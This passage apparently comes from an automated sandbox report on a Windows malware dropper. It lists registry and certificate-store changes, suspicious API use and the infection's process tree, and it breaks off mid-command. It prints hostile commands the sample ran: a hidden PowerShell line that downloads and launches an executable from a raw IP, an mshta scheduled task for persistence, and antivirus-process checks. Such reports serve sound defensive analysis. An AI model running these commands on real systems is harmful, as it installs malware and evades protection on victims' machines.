01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f336090758dbbe4cbf256d722780830800000000020000000000106600000001000020000000eb43973ffaf65e1fc77b4efe131210eccb13f794dda141165c7ab62716f190e8000000000e8000000002000020000000e5a1494b22af983ee0358c7fa07013bdeef9c3a321eb204e409e10ef0a46648a20000000ae7294c45794ecbba2d9e263e20612223d9295620992a90977f6f81f1be161d8400000006cce6394d9c08faee2a75f72fba53dca0da9a4e8ec06a55a9e55fc6fd828c6767a4561f4d7813346b371c27b5f1f508062c28ff55d173fd7225001659a1d39a8 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f336090758dbbe4cbf256d72278083080000000002000000000010660000000100002000000095e6576dc79148aca7a2bafa914296c16333a9f7339e2542e6ec30972b3ed2f9000000000e8000000002000020000000204fa7808fa3fb0042a83c5b4db542f453e6a49bbc092c7dc0477be624a142759000000022c034b203dad289b03f6059757b53cc160b4016161ee386a0f24dd11dd94fee8bc7f9b38bba4712d9d0f8de6a5bb088bc7273f3a9daa1f001a97254beb0a6444a006fe17cbe06e619d4f9764516f751492a5d94efa7e36a747d9d2ee55d86547f0acc2539faafe98c71e1763ff8c75735a63c0a82117ac4fb8915b35dbd566115f7d84d34a594312d0f085b47aefad940000000f4d53fbc44678ff022b88f06e7ff115aa1c7ce3130a6449d19fc1b179f91f9a17c94ceb5d624320e0995de756ea6f3cc2d9a5fa246410d9a650156e6e39a7d40 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_Classes\Local Settings firefox.exe -
Modifies system certificate store 2 TTPs 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 XxzH301.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a XxzH301.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a XxzH301.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 XxzH301.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd XxzH301.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2108 schtasks.exe 2872 schtasks.exe 2496 schtasks.exe 2232 schtasks.exe 3624 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 48 IoCs
pid Process 1856 powershell.exe 1856 powershell.exe 1856 powershell.exe 2716 TempPHIPCPMRGKMJUQGTHBUBC89AKNPGNCYQ.EXE 2800 rapes.exe 2648 PfOHmro.exe 3016 Occupation.com 3016 Occupation.com 3016 Occupation.com 3016 Occupation.com 3016 Occupation.com 3016 Occupation.com 3016 Occupation.com 3016 Occupation.com 3016 Occupation.com 3016 Occupation.com 3016 Occupation.com 3016 Occupation.com 3016 Occupation.com 3016 Occupation.com 3016 Occupation.com 3016 Occupation.com 3016 Occupation.com 3016 Occupation.com 2648 PfOHmro.exe 2068 powershell.exe 3016 Occupation.com 3016 Occupation.com 3016 Occupation.com 1988 powershell.exe 2576 powershell.exe 2664 powershell.exe 3060 powershell.exe 1988 powershell.exe 1988 powershell.exe 780 TempXV1OBJEDSIJF28CVP2PRMRQXF8C2XOYB.EXE 2320 483d2fa8a0d53818306efeb32d3.exe 2588 e267fb67b5.exe 2676 a221fd437d.exe 1360 156f54f6b5.exe 1360 156f54f6b5.exe 1360 156f54f6b5.exe 3372 30c6dab708.exe 3372 30c6dab708.exe 3372 30c6dab708.exe 3372 30c6dab708.exe 3868 powershell.exe 4020 powershell.exe -
Suspicious use of AdjustPrivilegeToken 19 IoCs
description pid Process Token: SeDebugPrivilege 1856 powershell.exe Token: SeDebugPrivilege 2648 PfOHmro.exe Token: SeDebugPrivilege 1772 tasklist.exe Token: SeDebugPrivilege 1984 tasklist.exe Token: SeDebugPrivilege 2068 powershell.exe Token: SeDebugPrivilege 1988 powershell.exe Token: SeDebugPrivilege 2576 powershell.exe Token: SeDebugPrivilege 2664 powershell.exe Token: SeDebugPrivilege 3060 powershell.exe Token: SeDebugPrivilege 2496 taskkill.exe Token: SeDebugPrivilege 2208 taskkill.exe Token: SeDebugPrivilege 2648 taskkill.exe Token: SeDebugPrivilege 2440 taskkill.exe Token: SeDebugPrivilege 2456 taskkill.exe Token: SeDebugPrivilege 2608 firefox.exe Token: SeDebugPrivilege 2608 firefox.exe Token: SeDebugPrivilege 3372 30c6dab708.exe Token: SeDebugPrivilege 3868 powershell.exe Token: SeDebugPrivilege 4020 powershell.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
pid Process 2304 dc25d718f31abfb22d767a38383cc4534ecec474e88e9b84b9e437fb97fd5017.exe 2304 dc25d718f31abfb22d767a38383cc4534ecec474e88e9b84b9e437fb97fd5017.exe 2304 dc25d718f31abfb22d767a38383cc4534ecec474e88e9b84b9e437fb97fd5017.exe 2716 TempPHIPCPMRGKMJUQGTHBUBC89AKNPGNCYQ.EXE 3016 Occupation.com 3016 Occupation.com 3016 Occupation.com 1960 iexplore.exe 1748 3b9ee8ffbb.exe 1748 3b9ee8ffbb.exe 1748 3b9ee8ffbb.exe 1360 156f54f6b5.exe 1360 156f54f6b5.exe 1360 156f54f6b5.exe 1360 156f54f6b5.exe 1360 156f54f6b5.exe 1360 156f54f6b5.exe 2608 firefox.exe 2608 firefox.exe 2608 firefox.exe 2608 firefox.exe 1360 156f54f6b5.exe 1360 156f54f6b5.exe 1360 156f54f6b5.exe 1360 156f54f6b5.exe -
Suspicious use of SendNotifyMessage 22 IoCs
pid Process 2304 dc25d718f31abfb22d767a38383cc4534ecec474e88e9b84b9e437fb97fd5017.exe 2304 dc25d718f31abfb22d767a38383cc4534ecec474e88e9b84b9e437fb97fd5017.exe 2304 dc25d718f31abfb22d767a38383cc4534ecec474e88e9b84b9e437fb97fd5017.exe 3016 Occupation.com 3016 Occupation.com 3016 Occupation.com 1748 3b9ee8ffbb.exe 1748 3b9ee8ffbb.exe 1748 3b9ee8ffbb.exe 1360 156f54f6b5.exe 1360 156f54f6b5.exe 1360 156f54f6b5.exe 1360 156f54f6b5.exe 1360 156f54f6b5.exe 1360 156f54f6b5.exe 2608 firefox.exe 2608 firefox.exe 2608 firefox.exe 1360 156f54f6b5.exe 1360 156f54f6b5.exe 1360 156f54f6b5.exe 1360 156f54f6b5.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 1960 iexplore.exe 1960 iexplore.exe 1792 IEXPLORE.EXE 1792 IEXPLORE.EXE 1792 IEXPLORE.EXE 1792 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2304 wrote to memory of 2468 2304 dc25d718f31abfb22d767a38383cc4534ecec474e88e9b84b9e437fb97fd5017.exe 30 PID 2304 wrote to memory of 2468 2304 dc25d718f31abfb22d767a38383cc4534ecec474e88e9b84b9e437fb97fd5017.exe 30 PID 2304 wrote to memory of 2468 2304 dc25d718f31abfb22d767a38383cc4534ecec474e88e9b84b9e437fb97fd5017.exe 30 PID 2304 wrote to memory of 2468 2304 dc25d718f31abfb22d767a38383cc4534ecec474e88e9b84b9e437fb97fd5017.exe 30 PID 2304 wrote to memory of 2492 2304 dc25d718f31abfb22d767a38383cc4534ecec474e88e9b84b9e437fb97fd5017.exe 31 PID 2304 wrote to memory of 2492 2304 dc25d718f31abfb22d767a38383cc4534ecec474e88e9b84b9e437fb97fd5017.exe 31 PID 2304 wrote to memory of 2492 2304 dc25d718f31abfb22d767a38383cc4534ecec474e88e9b84b9e437fb97fd5017.exe 31 PID 2304 wrote to memory of 2492 2304 dc25d718f31abfb22d767a38383cc4534ecec474e88e9b84b9e437fb97fd5017.exe 31 PID 2468 wrote to memory of 2108 2468 cmd.exe 33 PID 2468 wrote to memory of 2108 2468 cmd.exe 33 PID 2468 wrote to memory of 2108 2468 cmd.exe 33 PID 2468 wrote to memory of 2108 2468 cmd.exe 33 PID 2492 wrote to memory of 1856 2492 mshta.exe 34 PID 2492 wrote to memory of 1856 2492 mshta.exe 34 PID 2492 wrote to memory of 1856 2492 mshta.exe 34 PID 2492 wrote to memory of 1856 2492 mshta.exe 34 PID 1856 wrote to memory of 2716 1856 powershell.exe 37 PID 1856 wrote to memory of 2716 1856 powershell.exe 37 PID 1856 wrote to memory of 2716 1856 powershell.exe 37 PID 1856 wrote to memory of 2716 1856 powershell.exe 37 PID 2716 wrote to memory of 2800 2716 TempPHIPCPMRGKMJUQGTHBUBC89AKNPGNCYQ.EXE 38 PID 2716 wrote to memory of 2800 2716 TempPHIPCPMRGKMJUQGTHBUBC89AKNPGNCYQ.EXE 38 PID 2716 wrote to memory of 2800 2716 TempPHIPCPMRGKMJUQGTHBUBC89AKNPGNCYQ.EXE 38 PID 2716 wrote to memory of 2800 2716 TempPHIPCPMRGKMJUQGTHBUBC89AKNPGNCYQ.EXE 38 PID 2800 wrote to memory of 2840 2800 rapes.exe 40 PID 2800 wrote to memory of 2840 2800 rapes.exe 40 PID 2800 wrote to memory of 2840 2800 rapes.exe 40 PID 2800 wrote to memory of 2840 2800 rapes.exe 40 PID 2840 wrote to memory of 2648 2840 PfOHmro.exe 41 PID 2840 wrote to memory of 2648 2840 PfOHmro.exe 41 PID 2840 wrote to memory of 2648 2840 PfOHmro.exe 41 PID 2840 wrote to memory of 2648 2840 PfOHmro.exe 41 PID 2840 wrote to memory of 2648 2840 PfOHmro.exe 41 PID 2840 wrote to memory of 2648 2840 PfOHmro.exe 41 PID 2840 wrote to memory of 2648 2840 PfOHmro.exe 41 PID 2840 wrote to memory of 2648 2840 PfOHmro.exe 41 PID 2840 wrote to memory of 2648 2840 PfOHmro.exe 41 PID 2840 wrote to memory of 3044 2840 PfOHmro.exe 42 PID 2840 wrote to memory of 3044 2840 PfOHmro.exe 42 PID 2840 wrote to memory of 3044 2840 PfOHmro.exe 42 PID 2840 wrote to memory of 3044 2840 PfOHmro.exe 42 PID 2800 wrote to memory of 1316 2800 rapes.exe 44 PID 2800 wrote to memory of 1316 2800 rapes.exe 44 PID 2800 wrote to memory of 1316 2800 rapes.exe 44 PID 2800 wrote to memory of 1316 2800 rapes.exe 44 PID 1316 wrote to memory of 1736 1316 ReK7Ewx.exe 45 PID 1316 wrote to memory of 1736 1316 ReK7Ewx.exe 45 PID 1316 wrote to memory of 1736 1316 ReK7Ewx.exe 45 PID 1316 wrote to memory of 1736 1316 ReK7Ewx.exe 45 PID 1736 wrote to memory of 1752 1736 cmd.exe 47 PID 1736 wrote to memory of 1752 1736 cmd.exe 47 PID 1736 wrote to memory of 1752 1736 cmd.exe 47 PID 1736 wrote to memory of 1752 1736 cmd.exe 47 PID 1736 wrote to memory of 1772 1736 cmd.exe 48 PID 1736 wrote to memory of 1772 1736 cmd.exe 48 PID 1736 wrote to memory of 1772 1736 cmd.exe 48 PID 1736 wrote to memory of 1772 1736 cmd.exe 48 PID 1736 wrote to memory of 788 1736 cmd.exe 49 PID 1736 wrote to memory of 788 1736 cmd.exe 49 PID 1736 wrote to memory of 788 1736 cmd.exe 49 PID 1736 wrote to memory of 788 1736 cmd.exe 49 PID 1736 wrote to memory of 1984 1736 cmd.exe 51 PID 1736 wrote to memory of 1984 1736 cmd.exe 51 PID 1736 wrote to memory of 1984 1736 cmd.exe 51 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Executes dropped EXE
PID:1208 -
C:\Users\Admin\AppData\Local\Temp\dc25d718f31abfb22d767a38383cc4534ecec474e88e9b84b9e437fb97fd5017.exe"C:\Users\Admin\AppData\Local\Temp\dc25d718f31abfb22d767a38383cc4534ecec474e88e9b84b9e437fb97fd5017.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2304 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn A7XKlmaRIxe /tr "mshta C:\Users\Admin\AppData\Local\Temp\hlVunSjuK.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2468 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn A7XKlmaRIxe /tr "mshta C:\Users\Admin\AppData\Local\Temp\hlVunSjuK.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2108
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\hlVunSjuK.hta3⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2492 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'PHIPCPMRGKMJUQGTHBUBC89AKNPGNCYQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1856 -
C:\Users\Admin\AppData\Local\TempPHIPCPMRGKMJUQGTHBUBC89AKNPGNCYQ.EXE"C:\Users\Admin\AppData\Local\TempPHIPCPMRGKMJUQGTHBUBC89AKNPGNCYQ.EXE"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2800 -
C:\Users\Admin\AppData\Local\Temp\10136120101\PfOHmro.exe"C:\Users\Admin\AppData\Local\Temp\10136120101\PfOHmro.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2840 -
C:\Users\Admin\AppData\Local\Temp\10136120101\PfOHmro.exe"C:\Users\Admin\AppData\Local\Temp\10136120101\PfOHmro.exe"8⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2648
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2840 -s 5008⤵
- Loads dropped DLL
- Program crash
PID:3044
-
-
-
C:\Users\Admin\AppData\Local\Temp\10141220101\ReK7Ewx.exe"C:\Users\Admin\AppData\Local\Temp\10141220101\ReK7Ewx.exe"7⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1316 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c expand Ae.msi Ae.msi.bat & Ae.msi.bat8⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\SysWOW64\expand.exeexpand Ae.msi Ae.msi.bat9⤵
- System Location Discovery: System Language Discovery
PID:1752
-
-
C:\Windows\SysWOW64\tasklist.exetasklist9⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1772
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"9⤵
- System Location Discovery: System Language Discovery
PID:788
-
-
C:\Windows\SysWOW64\tasklist.exetasklist9⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1984
-
-
C:\Windows\SysWOW64\findstr.exefindstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"9⤵
- System Location Discovery: System Language Discovery
PID:3004
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 7899199⤵
- System Location Discovery: System Language Discovery
PID:2996
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Deviation.msi9⤵
- System Location Discovery: System Language Discovery
PID:2532
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "Brian" Challenges9⤵
- System Location Discovery: System Language Discovery
PID:2108
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 789919\Occupation.com + Kate + Invisible + Tells + Gross + Amend + Foul + Snowboard + Digital + Fraud 789919\Occupation.com9⤵
- System Location Discovery: System Language Discovery
PID:1912
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Drug.msi + ..\Contributors.msi + ..\Anthropology.msi + ..\Activities.msi + ..\Opens.msi + ..\Having.msi + ..\Dimension.msi + ..\Responding.msi + ..\Series.msi + ..\Salem.msi q9⤵
- System Location Discovery: System Language Discovery
PID:2492
-
-
C:\Users\Admin\AppData\Local\Temp\789919\Occupation.comOccupation.com q9⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3016 -
C:\Users\Admin\AppData\Local\Temp\789919\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\789919\RegAsm.exe10⤵PID:2428
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 59⤵
- System Location Discovery: System Language Discovery
PID:2760
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10142150101\XxzH301.exe"C:\Users\Admin\AppData\Local\Temp\10142150101\XxzH301.exe"7⤵
- Downloads MZ/PE file
- Executes dropped EXE
- Modifies system certificate store
PID:2404 -
C:\Users\Admin\AppData\Local\Temp\mic800F.tmp.exeC:\Users\Admin\AppData\Local\Temp\mic800F.tmp.exe8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2948
-
-
C:\Windows\system32\cmd.execmd /C del "C:\Users\Admin\AppData\Local\Temp\10142150101\XxzH301.exe"8⤵PID:352
-
-
-
C:\Users\Admin\AppData\Local\Temp\10142240101\m4mrV1B.exe"C:\Users\Admin\AppData\Local\Temp\10142240101\m4mrV1B.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2936 -
C:\Windows\system32\cmd.execmd.exe /c 67cc62a429f2f.vbs8⤵PID:2148
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67cc62a429f2f.vbs"9⤵PID:1648
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 